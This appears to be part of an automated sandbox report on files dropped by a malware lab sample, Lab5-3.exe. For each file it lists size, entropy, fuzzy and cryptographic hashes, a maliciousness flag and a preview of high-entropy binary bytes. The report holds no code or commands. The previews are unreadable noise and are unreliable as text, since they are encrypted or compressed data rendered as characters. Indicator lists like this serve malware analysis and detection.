                                                                                                          Preview:$..,W...0.).eJ..6?...`.7.....`.\R...................>...G.y.`;.-.A..n.k....`."tb..L2].....`...Q....w..b.........1.P. ...o{S.3.dl.H0.z.....l...B~.Z.."..1.&n.2....R..5.hs... 8.....&..."..=WT.G:.o=.u......`..~.'u..h.........y......@..K<-..F,.I..a.u.4.r?..M.L...#OQ(......R..A55.y...7.7.B...'2......!o(.....g.uq.W.u..U.....N....g..;.D.W....<.....g..B.G..I@..F....^j...J_j.9j.g^A.:I.5..#..]....5.k...).nF......%<..x,..-..6...hmd...0X..........Av~\^.m..m.*.a.S...f>.y<..(.X.Z.D.PNN.I.n....h...]E.9..4*v>....$o..V..Y.......+.V.z..|......Zj....]u.S.....4...Z..[.........s.E|......8.s.[r...s.].:Y...e........A.1.B.w...2D...<........N..D7..;.-];..vO}1..m,..J..iK..\..}.........M./^(.#...&..ig..Q.....f...-.aG.>.0..7R.U..y...z'....[.v~!+bpn-.-a.o...`..wM0".3u..k....a..Ce.jq......b>....:t..n..........3y..wj.i.=...i.&Y...U'.<..f....4...Q}.*@o6.5...^...'.".?....%..g.{.".V..>q.$D..s.t{...!...,.H.v...0L.K.=f]...\.R...~r....o.U.....b.<..&..7....~.a&F...}........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10096
                                                                                                          Entropy (8bit):7.983823408955228
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:4WgLg7BcKLyCfCeIUJGHD2EbX6zDWCabv09HXnjL2NxM/jJ0Cb:+LgXlfBIUJ02EbX8DWnc9HPGxIJtb
                                                                                                          MD5:A33CFBDC8513777B00BBDF23F16A9C65
                                                                                                          SHA1:9F29A5313806A01326CB429E9955E7F234490857
                                                                                                          SHA-256:5C1B6F88EF3074FB44CADBB88B3214E8993D57440FA90A10CB37D3FB18613D33
                                                                                                          SHA-512:3369A1661D2464301129BFBE42E5980282A9A160253378D5A236AA046D2969B67E4447239BE47CD42126322C3100FB0302D777CE9B34F6897FFFA9534471D5AA
                                                                                                          Malicious:false
                                                                                                          Preview:..Nj..g..%.v.j...Pg$.....&......j....m....#K........~....[d...-2..G..%..X...N....e\:.....4.!...T.......}$..g.x.7.9+...gE`.3.Q..+...mXEP...Z.T.>F.t...W..M.nU3+...6.....Ffc.....@.QF.....4..&WL..z..qBG...,.`U#d17^.Q@n.D..\.r..n.|.!..c.M.o..(O.....s..y..C.~f....).4r.._.....5\..k..yL.D.a.c..kI.f.+j.h..d..B@Bz..8..}o.}-............u+Hn....8..zF..y_.}......G+.d..&..._.t.]...>...P.*...^...W..RA...`.Z...I..g..1m7......4Jstj.+.....}...V.j..,..1..I!s...>..v.T6...Ee;.s.UB*.........X{.....Z.G...>c.N.U../....h%P.&^....Y.7....2....US.*?..[.biD..>......d.P(s.1s.....,..X.....D.....%...E..z0.c..:..+.i...%4r..#4zS.XY..a..l.Yv.....{Qg'.t.C..Zl.VY%s....5....b..A.W.uo, HpE...*......f..d<...[.|.......T...]T(...m..C6.H.....*'g..<.{.M.U.4{.B....P;0.".`....Gf$.x45.....Sd..^1I.b;.....c.^K..t.-.5/.5.X[A.R....uKY..<Ox.!~LQ..p.........:...{......k..!..<.#BY?...1..p..B0.....%v?....[.C..a.zzZE....|5.4.LJ...-...[..|.......@^^f".1k..(.....:....L,.....1.U....b.#.?.c40I..{.q.=
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2656
                                                                                                          Entropy (8bit):7.935176142073569
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:pM7QRqJb9UYc/jyZGorPKfWhHfUTid3hBaUoSGFcmeykEdEElU92i:/qJZMjL0PKNGx0uKeY2ElUJ
                                                                                                          MD5:2F7375537EF56D8491F7E244DEE2A658
                                                                                                          SHA1:27513FFC2919D9FEF1869C56A9C75F5A54A023D1
                                                                                                          SHA-256:84407A2B5B0D1663ED4C4BE6EB9859312D84C8DC47B7D4FC1710CBBCCF0BED67
                                                                                                          SHA-512:AB2E80E4334BA03457793040C9E639CCAC4F468CCDDE924F0055D3A69BE06C9CD1FB394C62A90BBF9608DA0871B9C24DFA7BFAACE201A944D577122AA663C2C3
                                                                                                          Malicious:false
                                                                                                          Preview:...DjM.@...Ewa1{.....B....Q.].NFw..3..K......*k.*......R.w.>.&0.^.r ...N.m.;o.Y+.O..E..]mI.e....rm..._..)V..z;..=...p..0....#. .A.....d..(m..."]..@E^..'..jz...g..*.j..+^.v4. ......o..>e.....|.:.7#&H...'...ew..+..%.M.E}"Q.LGC.).&.....P....W.d.Ua.k.{'...X.~....1C...m.....i.&52.t....=/7._..$././2.k..c.T..d.....5.w.@...A......)..b..P..&.j@....A._0.y....:.v){......v"..gO..e...yH.vI..j ..c...?>^..r...sui7.`P".e....j...{..../....~,84...(..{M.P.[...pI..s.xu....-.{...w...I..Z4......^...4..!........74..__O..qn.P.a.._.0k.dv..j*.....d.......$al.'.\....+.?>...!.u.F_...9...Hc...$i........I?.k+...G.1@'.p.@fV*..... h.|v..?..u.R....L.....D...._.b.....P.....w.}.2m..%.V..9..'8.....Q&.O.t.>..v......Dr.w.)t.&.M..a..r..o..<.]#.M[.R.J.T...wo?G....O[J.zL.........-..=..g.8..__.r.)+.zUE#....M.^.B4..:._..'.......Wx..>1..d:y...r.9CO.$u....kz.....L.Q...G`Jt...<VI6 .mj2Rn...h.v|......1.JYR....J~.Sf+.l...f.+w&.#..KA....<..e.C.@.q..M..d...i|.w...[...jx.k+q.9.5.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3584
                                                                                                          Entropy (8bit):7.946992520549888
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:BBj+UMk5jwvgJgWeSGgGcGx0uKeY2ElUJ:XrMkNlgxBgw0Cb
                                                                                                          MD5:8304707F41DBF5AD6E407BDBAD2A5056
                                                                                                          SHA1:5B8B1C88A91E9A61EDD5A93D445A7A93946FB204
                                                                                                          SHA-256:1ECB0E281054E20A72CCCEB944A82F67A5CC4C526957D21DE0E43B6F4445620F
                                                                                                          SHA-512:50C678F4956AD537EA82F2DC985DE3892DCDF890D92CD3756C7DF6CC3EE7851EE3FFF89EFB13DB1A65ACE9CFD12AF8528886BF491BA1EEBF36BAC39B3BC97F9C
                                                                                                          Malicious:false
                                                                                                          Preview:......7W]T3.>...X..g..g....9..+......,.s..R. .P..%~.%kI.....c.]0<>z.........f.0."....J..q.Le.Z?^...*......!.G.j...9L..t...>S.o.?... D..uu....w.zr.]............6.s`........3...z..n.|..C%.]]A..Hc......UA......31.,.X..U}x...P.G.#..........%..q.5..9....,\.....O..7p.'.b.*|S.<.{...........:z`}.dx.8.'._....C.....9....G@A..g...c.0...g..O*..b..Y...._..sR....8F.....gy.?.Q..C..&.R..x.......P...Q6..V.x.a.l...l.3..P...n..8:.N.lof....\\.x..<Rn..Su._s.....O...a.?....1t.'c..L.V>[....!.'..C.q~J....R.&..j.ETa.....)..2...9.w.:...L...J.gv.....h=U.....p9h...j3.....B.P..>s.p.,..^...C...S...P..<S.{..w..$.'v.....Rd.._a.5....e.olu].>.....c.|Z6.3.\....'.+.&.,.sf!\K;......"W\..nA....~yh./..."...Q....b(n.A.x.m.....sKR.0...:.++z...Jg=E...;...#k..:.....%...a...R.H...6..X.(.2 .....K...S..Tn.bz...V.93o...........b~O...N.#..E...\,w..8|vF..9.....9m3........'.M..[......,3.f..-#.m..5.....b.H&.rS]7..w.$M...........%..A..|&E..v.....m...3.0..e.&...'..)....@%........N.(..K..$tg=... ...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2528
                                                                                                          Entropy (8bit):7.932038071878806
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:H14EanQbVwznA2FO5chhYCuw7S4ew7BHfUTid3hBaUoSGFcmeykEdEElU92i:HMQbBTchSQeuOGx0uKeY2ElUJ
                                                                                                          MD5:C4E06EE46FDF08279D0096FD311F6994
                                                                                                          SHA1:157718FFF942BA09CDF25735BDD898CA7AD059E9
                                                                                                          SHA-256:4E289AC6C4ED52DD2C0337ACE2D033232AE513A75BBDACED3194C3E1BD9FCA86
                                                                                                          SHA-512:78B415A23B7B2939944DF81304A52B33DAC566FC451B1C9B3BAC3FD82F3F1B5438EF767FCC1F02E55B236ADA7F35B8171138020D844654A109C6684DE9350648
                                                                                                          Malicious:false
                                                                                                          Preview:8o{.c.7.e^~A.L.6*...@U.....e4..(y.H...7Y............BL...U...%WV..%<u.!V.}K.r.`....4..`...=.w.....Q..]....&-.-i(.<..a....\.2._...yT:...3(..3c!Q..{#.i.<...~.b%..j..9!....a?.@.b..6.31....<.5k..d..x`....4o*...Bh*....j..(..ST.R...e..St..."..o:N........%..t....8..f_Q.}.....E.jY.."..A.).......s+.....c.g*.y...$..^..... ...f.G9O....k.|..;..q.....r..T..a..C.....9....I]0...e.(.`..^.GB~.S7......O`3(.0K...*....9.1k..pv.fpT.9J...V./...b.e:..T..\.k ....5;...;;j+...u.....s?.z........Z`u:.].T43....Z.F@.=r6.|....B-..2.....n..........xVw...IC.1...3.l.(..+..u.}.......W.J.t...;0.J.W..l.z...3#..^o.;.xN.ne.Az..X.f.b.9..7g...|c....;(O..?aR.U.s...F...Y+J#......|...w..l...O..Na.....E....&.Bu.Q..[..G..qDP...7...|.E.o....'.H..%Me..|.....i....K.;...+....@.Z....zp..51{...T....c....v.......7..-`.~..{...m.Rv.....ry......l..w..6sH...y.g...pu...t..6.m[ ....T..iR..vF-...l.Y..Q .C.*+..=....'..J7w....8..|a.....su...o....r.-.......}.:@..8.K./.o....*..u..[....^.!...r...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3136
                                                                                                          Entropy (8bit):7.943218664315949
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:drCIp0/aCYJWRYJ/lImdSDhWZgJd8rGeqHfUTid3hBaUoSGFcmeykEdEElU92i:YIpSYJWYFndSDhR8r5Gx0uKeY2ElUJ
                                                                                                          MD5:46507CC4945A1C9D3DB34BF4B9F944F0
                                                                                                          SHA1:16F7551BD81CD14342AA266E5B222E336F854A15
                                                                                                          SHA-256:5693F89829AE5EE09EAB4C21FD0219AD0893AD81AF058D49AE8EEBF325F3E46A
                                                                                                          SHA-512:F7EE949376A9E2B86C075DE1630B34773FE3FFA1AA6611DC8EEAEB2C487645F623D852CF0C5E182D63A4158E9153046E05C705753263FD8DBF5DE84A8E01FA43
                                                                                                          Malicious:false
                                                                                                          Preview:..I/...=.....J.A....'..g.QlDJ.....+..[.G..]".P.....!...$.x.|znJ..6I.t.aY.6.A(.......=Y.8..u.:.....L.E..yN.....%..OyYh.B._.*.*...8..8.B....X....:.i....;..8..q.g.....B"b..O....0-,.B&...R..0iR.......~...J.).....5..^..k....6.+...}.A........i._.u....p..b..9pN.P....q.7..[...O;..)..g.. qV.?d.s.........E.m..M.RU~...'....78...Y.89.Y.....a.x..+J..G..|e..a/O$.,......F.|.0..`......r<...L.F1..P.C.o...C...>kh...h....C..AM..F..%cM.Om......t.4$.F.kg...Y.b.s.rU1^...F19..?D..@hlf~.n.7.z...+:q........_z..3f....t.r[wbE..50m.p..w.pg\.k.2.PF;..>..'..8.Z^.v..~.Z..0.@..&...0r8...;>.P7..O....D=s=.343..dk...H........WL..V.#.#.....j.[...<:?<P.q.5f..h..H.......R).n.I.l........f@..t...8....w.*.....-..\......S.".]qE..P.\.W......e.....U.x...S$...`.-.Xe.^...\...0A...1a#.[.Zy3.=.9.n..O#.......a.)...e.N.X.i]B..5J...N1....#.42..Tq.60.Y.....D..9..${"...mG.....d.....ua.,$..E..u..l.F.fg2.%kh,.H..K...J<Ss5B.L.......V.[....oh.<ev....A.J.Rf(r(...O.....x.{o!..]:.VQCzP..tz.N....>{.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2832
                                                                                                          Entropy (8bit):7.9371479109764955
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:kT7Tg3iRW8TicDoW7KOXtum6b9Gr4HfUTid3hBaUoSGFcmeykEdEElU92i:47T/W/ccW7KOX/6pGrfGx0uKeY2ElUJ
                                                                                                          MD5:B7B76599FCC7E626B37F940934C7ED17
                                                                                                          SHA1:D5FD51D9CB9CC9534000BE855737A3675C8352DE
                                                                                                          SHA-256:B8A6DC41DD027CBD3A501A82A3E1780545630C5E0BDDE8C6A64FA84FF15F41EC
                                                                                                          SHA-512:97537874840572F241BFB1184793949509A71FC15F7FD4B961B34CDB1FAC74CFB2956BCA9FBA99DCE04B568B6540B90C56562C5A82E333DF4865E595AD223DC8
                                                                                                          Malicious:false
                                                                                                          Preview:|.w.P.m..:...Y*.h.Y.R....#.k.er.....<J..5|w.J.<......R..15......cp.M.|4.....h..E... ......'.X....Q...p...-.Q..h..%.T...3.......S/D..+&/.a.}L..p.ZL...).v{.<k1.....S.X.?.\n.....Oi...'B.....^.../....V...m....W$@K.^....H.!L...g...............]y...G.M..UTOjP...W..%..>..(.8..=...7..Wt...H-...|..V...5...1..w. A/\...wH.ev.2.u..$..#....EYUd.o.<....8.i.N."..!..B.\0.}.zRO..}....[.L..n..+.q.>t.\z...)....PC.........($....;C...]^n.....Y..hx.W.]DG.......&....0...!.$Z..K..........f?..Dh.UPS....|.h.......7.....ZJb.\fF2..I=.*x=.([.q........4..`>.*.'.c..n.eB.g2.F....)6....9....\?....[....+.v.]..).c`.m.K.O..Ju..@.5x.A+.....7O..%.xm.#n":...,.v.1.V.....J.S..Q^k....J).Z.]...(.#.......[..~}po....?.t[.'...S.i...|E._.b..J..Cl.:N......in.={'.g`..$..A...sr$.....v.uoot._...R,zI!d...&..3..GV..H.j@e@..f...X6.2s.!d...[.%.F<.T..C... |......km......Rl.F.....Y.K.)dst.....PQ;..$.....5N.TS..a.*.....s..sm..>/..'...8CGVfO..p......<.XD.n@U'd.E.* ...V.P..d.7..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9488
                                                                                                          Entropy (8bit):7.980788488879421
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:e2zCDKjkyGKjndKoMVDhOJySPzI5M8jnIBag4TgfyOiUq0Cb:e2zCmjLGKjdKoMVDA9zI5MF4w9iFtb
                                                                                                          MD5:55445BE978EFF73C7ED1DF4397AB2148
                                                                                                          SHA1:6BB72686A071DE2550B6F90EA9A82C89FE76DB60
                                                                                                          SHA-256:6DFED527020D7CECAD7885626F6DEFAD81385CE69C09EF420B7D10D629B569D0
                                                                                                          SHA-512:3A36CC3B976EEFB8CEA2E87229CA7720906CBADDFC36F30A163629AE0D785D0E11C4AD52CA317B8436D553D1FEA4DFF1B3E5D6C2B58947A1389FA8135D049BA5
                                                                                                          Malicious:false
                                                                                                          Preview:.)..y.J..$4=~.x,.A>R.hG.".?g.)M5.....u].l-..@,g.Df...kP....Q.....F..P,....x..G....Bw.J....\..I.8Q.<v..?m..)T.8.W@\W.....H}9.}.OtY@.E....r..H.Z{..].......O....UZ..k...f.~......L......^Z_..~-...xh./.a.[.~p..Y........696~.H..}...c{.....;.7....3..}8.ol&.....B.|....Utn+yI.n.5...DtR.tP..|.....o.n.\6.........a...S&...(O.f..X.\.K8.5.C...p.)..t!.As....O.[h...L2..uU.5..GJ..L..F6...z.!'.s..6..I...\...;.9...$.I.....B].".:MART<.)..5.-.....]M.9.)8..5....P~.Dj..QXn..1..."....-W".Q.=...?.O......%..M.....Y+.+...{.Bf#e...+....b...P....\.s...m.p.%....g.BV.+sst.-..$...y..e.dv....!..-.'.....e..Z\7S)...}..T.D.Pq........t.nP..#..j(?../..#g..Q.(.V.E..........,..v....t..|%.o.W..$..)'@..@..o..|0M.Y....o.e..NM..1......[.j......q.7..F..,.G.w....Y...[.Bp3..}.H>.^=.gv.."..Yl.?.....V.!nz..,....$..`....Iu.`-;.ef.F..c..C.T...^..UL:..]...._#.........+[.....5K.....Z.l..u,./^......m....d....?...K6A.\..E.6...4we..wr...~c{.$...5w......A.btr5Hl9.>'<........2.@.|..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4048
                                                                                                          Entropy (8bit):7.95494809949785
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:KWzu+Pt4ImWGOFsekciEQeFq/xpliGx0uKeY2ElUJ:7XPt4fWrxkcVQWq/Pr0Cb
                                                                                                          MD5:B17E783D4DC51ADA9DB254CC2327EAA9
                                                                                                          SHA1:CD99202AC1FDCFE4636AF87ED640CE075D2C5814
                                                                                                          SHA-256:7EF51E12556E25542DCFD05CE25F1B098D0FADC1EB4241BE84F3E623E319204D
                                                                                                          SHA-512:3CC8F24D0A3A75DB6E41218A320CB1516D457E9A1ECF6877EED33852BB19A46BDC8418C74D248E55C6D5AA945F5CBE3F4A401DC2E8F188D8AE9604751AA6F3E9
                                                                                                          Malicious:false
                                                                                                          Preview:.T.. ;.,R(.y.{.....8...w....w....5.....N.tYv.D...n..F...w|f...9.h7....\.../YZ..0..d.k7..^..;...".0M[.5..|....W:.%.i!.}.......V8....... .B./..4F....U.#..n4.l...<.:s....o..sc......q..C......|...f..y.@..(5.2.2..UJ....;.....3...$.D1..p. ....8D..k.|..T*Po;.f..l...O.I..A....d.N%....`...2....Z.........R?.-.M...4AL;a."V..m.`...$.*[.#......g...T..].!.F...V....Z..w.F4.(.T...[F.R]I..:b..oi...7.\.1qMw.../y.T.3......Z1..v=5,...RT......{[..{_.1.....O..@rY.K...%..../6I+i...!....,..)8%../@}.:...1V...Vi... ...JCaL.;..-..2.V,.k.p..2Co.T.....z.0~/|Qy./8.#|.$I..2..vr..3}f3......).5lc........ ..W......V.!....E.......p#..l.k.....6.....&wu.v.....).>._H...p..k."!NI...m...N.......L.._...`.....d.N5]M$3...$.59NoDx......'.KtK.a.._M....r...e...6Y...P....._....N6Y....q'...R).}.+.\..IM.N...+$.Z.*=.xRE.b..~.t4.!p...E..)a.....CG.mec.,...i....y....b.p...,...r.......j.M.......h..t.MU0".3F..H#....#........O.j..5......?..@n..'../P.e.....E...9m.y..+g6.nB..P.....b7..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6048
                                                                                                          Entropy (8bit):7.9692336433645306
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:X+AixZVNe109hrfrDaRjnydXunGL9j5UA8KB4UROf1BT23QRGx0uKeY2ElUJ:O5eCqzyZAGZlUpKN2BTTq0Cb
                                                                                                          MD5:7912CB36A9A6EBF0C9A9FC7C230FE0BB
                                                                                                          SHA1:236956B86504AAB55BDEE297C7ACB0212F816F38
                                                                                                          SHA-256:0C059EB686A8041342751CD8EEB4A6BBDFBD13D6C2713C553953D2F5B7B0D08D
                                                                                                          SHA-512:9ADC3AB4D1707C371B8B1CABCC0A9EF6EEA2678119A1E6056B6C060F26E050A763ABDCE7E9BA16CA110DD2558320A128E96F913904922F75C6673F2F1FDBDFE1
                                                                                                          Malicious:false
                                                                                                          Preview:...u)R}...kY`e......z...mf.pE....V..^....5.w..S-/..9}96.......[.q.PC.......E7....}L...;..9.>(..=;,>....9z...UK.......(...r.}..-)3..N.."v#..wS ..F...1)^.c.y..d..F...f.a....S.=...|'..&.J..i<.<7@"^..t..s..F...}....r\u.........TE......s....L.kN.\y.H.....z.@..j..H.F.hR..(p.=o.E7<4..0.X........ch..u%.]..Z..M.|....5..)s....y....R..8.X..Y.kz.....1...A.....ws..2....... .,1.....,..S.l....t.....g.I..{.D$.^.no.ojcO;A.w ........:....7X.I.(...b. .....E.....%:.../...o.*..h.....:.!..."..I`..bP.....=f.ln...... ..C...P!R..g.....nT.u.v.......;Jpt.....h1..4..6!....+........(=..>.{l]..g.-...s-..$.{. ....akr..a....m*....P9. .'}k.p.C.L*x...:..ipp s...m.a...c4.zm.5}UD.E..6....<>.....0..j.CH).P.Z......#)g.A..P...i..._?...0.].:......{........H..6..p>..)..W.|2..,P..bB.C:..{..<i.C.a.Re.......U."...(q.[L.#b..>..D.M....(e..3.m.....|.l.h....,.NH.._...w7cu..g...t....^&R..b....d.....\}.Hp.$...o.zl#..kp.YA.w{..a..P...#$QP&...w.....e.]....N=.g....{'9%....1..}..wF...`.-aI.Y&..%..(..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11936
                                                                                                          Entropy (8bit):7.985392515598088
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:ba0sngsGAp7hu4mWvysf2LPF7lBvmnRL8D1KWCTPAiRQutuVy971hvqk0Cb:snBGoAvW6ciFDQjEiR571oktb
                                                                                                          MD5:024455E7D27D17116732E0F00D77EFE6
                                                                                                          SHA1:C74F85F53CA6C7C51E79105395396575CDF9E166
                                                                                                          SHA-256:196822058EFE534C2551D9CCDAB1D078E95C54792545D2659A02011BE780E5D9
                                                                                                          SHA-512:84D4DCB31657B948AE9B50273187FA86E52DD6E1936C1F9B1297A7ED8B74BFC8A8555D18D537FD323B7FB208324F00455E072DAE4118760B2D2C49C58FC2C8BA
                                                                                                          Malicious:false
                                                                                                          Preview:.....I...IM]C.X...#4.e....../...u.<..\={.._.c...I...C%ik.'.......I..~.8Rw.....%...7....O._..[.b.6...,F..3~...i.9...(..u&........._..].d.]....AC..GF,{9.....r.V.$.pZ...q..;.^.V...'8..2.2.....Z..H.....J.,PZ.P...Vg.?.z.%..&5.14.?........i?.F...{.yRDT.U2JU...ji.F..n..n..m...1..U^.L'!.=...+.8..,..._.H..@FF..q..W......\.....m./.h,}K..3c.}.B.O>.Ll@.....[.E.X...z.g........7....(..L..T..s....f.>.N7....A......-...p)..c.....,........g..G.. .S.Z.-a..(...3`..o]0......7.5...bL4..n.B..O}r.9B.yI.fs....FG'...|w]gD.0*.).:Tl.]A......~...Q9s......_.|...}...`.I.g...#q.G.[V..>..5.~o...#..q]E..u..zN.......H.`E.[|.V/...PI.te.x.<...{9.. Q..9...P[K..vO......V.,........a.....#._+,..;xj.:_..T...\.;b.....!n......A.X....z1.H.....K..V...I4z.c/..v.......+.i..O.'3U..K...:.x.t...D...-.j..>....+L..8.....5O..rV....1.O..@..Y.SOmY..l`..^.4m........g.ea..2d.<x..z.%.C[..Z.a|.C3K4W.K...N.(.h..h......w.UVjl..@.!..d[..M._.. ].)PYW4......B..&.t.H....p..m......6qf.f.{.A}.!
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):21408
                                                                                                          Entropy (8bit):7.992401266222064
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:gUMHPtHLil9r+UC0HlnxYF3rrBlOBtEMOC8B36I7sbMR/m5y/OH7ftb:gUuP1MtJnxYNXBlOBt8C837sbw6fZ
                                                                                                          MD5:6DC380651FC18348CDFF7A7E7605FB99
                                                                                                          SHA1:A7C3D6250A65986D271A639E27A136B023CAA007
                                                                                                          SHA-256:3DC3854A5655E8F8BFFCBA878456AD6B51193BAE5B659A31257A138A52D97D1A
                                                                                                          SHA-512:02FF872E69528A4B61285A54DF6616468C410BC4D8B1E2A6F58A96C40CA52D6EAA229144CD3A87DB6051737F4220F91C514C0234294E0DCD3CF3A2B21C892A0D
                                                                                                          Malicious:true
                                                                                                          Preview:N7fh.,.O.c\.......E$.mR...:.yZD.8GO'...)+4..KN....dg..Oqj.X..>(H?W......4.P... K0......}+D.7"7....:..9D@..!.....^.Q...t.]?. .........."..?E.3..iW..(.qe.......8..l..'|.fk..q.jl#"o....R].\......P(.o.4g=.....L..X..J^_.Mp}.rsk.m!.d...%..........@.J.R}i...h.X'+..#8*g.&F...;.....I{......&...Y.z*.:..t..:{"T.....6s..Hm.~]y.}...b.=c..O..u.....@....5...:2j..'7.....0...U}.<j.k..y^B..^.lxo..X*.!O~.....vQ.M...?8.....vq..K...T$00....>JYq..s.U......._.)...0..8s.'q.E1.N.n......2......\jG.o.g.;.+.\..J.........-....^.B..k..E6+.e3......A.#.....=I..@I...<...}'..s.g....@F3y...$.b%em5....8.E......E...{J#.9Lv..7z?.F.../>..6[O.1.P.{...,4.Q.x...N....N...|4.-....a.:.?`.a..}....7..ldc.oJ..;...._._.....}..._..y*..27..T.......%.g...\...........Mz.....\...<Z..40.......K.p.....n...i.l....l....0..7.kt......3....b.8.Mi.x:..9.B.T..S...f.......j...Z...[.^..U...`....}.Vz..=..:<.J)#.=.Y4.|.|....Q6.x..U..`;.'B...Q...IO.K;......`p.;....n.....$.&|.#....G.......J...5.e..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2128
                                                                                                          Entropy (8bit):7.910762682721718
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:UZJwcnZFS3EpZwM/Z6l3nJxnxPs0vdVDHfUTid3hBaUoSGFcmeykEdEElU92i:aZFVpZ7cnvnpsodVQGx0uKeY2ElUJ
                                                                                                          MD5:45048347B6E1CFD8BF9A584AAE9FFAA0
                                                                                                          SHA1:443CBA16D54143CA39EEEB53CB2A46B0AE28FEBC
                                                                                                          SHA-256:233AA7DC54846B80125323B0547DEE55D81DCC67B5C1FBEAA071CDB695626101
                                                                                                          SHA-512:B3865C20A187F82F49E3FB5148EDFF373E9C3BFC9D0D130662D4DB25625BF5A278605145866938E02CAF05570A803E3CC0777E9B64194EF5C754AF88E54EE2C1
                                                                                                          Malicious:false
                                                                                                          Preview:...M.f....rK.pUog....o...>iaET..J..A..2....).k=&K....>.J....I........b.=..4...t<"?r.....{...R..d.....Zn3.....IH:x?L;...AH.Y:..>..~.....~...p;....-....,7..Goyz....`...i]q.6rV.k..+..P..%.........X.....z ..N_...-.M....J.......p.2.....l.....G)..\..d...[Gb..|.....6D....C........?:....o..#..d.yY.A..{.....5}..2 .2m.......X..n.d..>-.X...oNzZ....x....4 ,..R+.E.}>.5..%.'Jjv....I..........C.1...GR..x&>L....O...5..VV....`...c9...^.S...);...........?..]...).6m...cK..)d....]..}.7Z4.F....0.9.....2..!.o.j.#..c `.^..T.K.u.T........xP.x.#.1.....AR:#...iV.|..gU..E|s&..SW.._..|F......f.=M..ik......P.....4.\Y....,o......!..w....,..?..S.]..m#ij.q<6..&[.|.s4..q.U%.!:....hRxK........Mh..C.~p.!F)s...P.A.. [N\e?.wkhfp..K..}l.[....4~D].f.Q...\. ..7...F:}t..^...@.%5..?....2..g....|n.........3.W.....F.WUZ.w..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3584
                                                                                                          Entropy (8bit):7.947732238825136
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:1MSPpN2gZLcSEAeEl2kLgrQGRl+b54+Gx0uKeY2ElUJ:1NptLcSJeElOfTt0Cb
                                                                                                          MD5:E0A285B05DEB4D556FF220F931659359
                                                                                                          SHA1:EEE05FE61B624BD833975D60D6E442C71743A1CF
                                                                                                          SHA-256:DC72B3D3E666AD149D99B743D956B04D5EF0A70D28C68F1B79BEFDF0A820C0C6
                                                                                                          SHA-512:EF08BFE58263E66192DCB8741CDC7B80A19159607F44854C5594473DCD1547AB81D07F5DBEACBB1921880D6B2C8B4AFD187741918CCB58E494F8E6B5B6336F69
                                                                                                          Malicious:false
                                                                                                          Preview:z.'g..440..x%*.^S.89.5........v%..0K.....>.0{.l...>..:)+.............+..s....c.X..L....jx#.....L....N{......(.i./.H..Wmu...d3'...J.. +..G..?.....B..Fk...?.2'ypF*......_.2.....5.....Z#.x3.G...I<....<.=^~4....d.8\!.Pn.M.;}QD..B....4......).k.6.fY..._H....^..B....7.......oR6.*...%.z.....MJ.......dG6g..c.i..*..~..u....gO..h.Ez&...+O. ...Us.pzO.h...MC..D..|.-9L..#X.J..9...G...QF..5..>.JrJ~n.|%+..w.......d.A.c...V..d....!$-;..XD...{)qT.I..>......j..L...z..A.4.."4.N,aGk..._..R...PgPksa.M....'./.m..U...Kbi&+@.........?.$..v....../.~...`...(....n....u..NVu.....R......:..?&...^....G..l}v.+.4 rg........(.Ck.#.y'<.N1......*.m..<.i.)`A..l/..tQ0.........H.....+....M.oy...3..<...i...0...r...]..#.pm...Q!.x.....ET....Pn..L.<[.D..M..q......{..MGG.fG.X.............4...S$^......D...5..o.7.O.J.hC....U4svg...G..~m(kR..K...}h)..q....aq...#x.b..j*...#...{..{.....|Co%........f..YvV.i.....k.^.S.....,#..Lv=.al.:!t<.l6}....c..$.2......'......x....y......E..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5888
                                                                                                          Entropy (8bit):7.969951416828745
                                                                                                          Encrypted:false
